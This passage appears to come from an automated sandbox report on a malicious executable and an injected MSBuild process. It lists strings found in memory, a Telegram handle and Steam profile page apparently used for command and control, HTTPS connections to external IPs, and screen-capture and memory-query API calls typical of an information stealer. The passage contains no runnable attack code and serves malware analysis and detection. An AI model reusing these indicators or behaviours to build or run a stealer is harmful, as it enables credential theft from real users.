00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JDAKJD.0.dr String found in binary or memory: https://support.mozilla.org
Source: JDAKJD.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JDAKJD.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349510250.0000000019ABC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp, CFCFHJ.0.dr, IIIEBG.6.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: CFCFHJ.0.dr, IIIEBG.6.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1843666426.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1853924998.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349510250.0000000019ABC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001404000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp, CFCFHJ.0.dr, IIIEBG.6.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: CFCFHJ.0.dr, IIIEBG.6.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lity
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ontdrvhost.exe
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000607000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe String found in binary or memory: https://t.me/armad2a
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: JDAKJD.0.dr String found in binary or memory: https://www.mozilla.org
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/:
Source: JDAKJD.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000004FA000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/BKECAAKJKF
Source: JDAKJD.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2006550164.0000000025466000.00000004.00000020.00020000.00000000.sdmp, JDAKJD.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: JDAKJD.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2180571861.000000002272C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000500000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2006550164.0000000025466000.00000004.00000020.00020000.00000000.sdmp, JDAKJD.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.176.241:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 6_2_00411530 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 6_2_00411530
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2BED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C2BED10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C2FB700
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2FB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C2FB8C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_6C2FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C2FB910
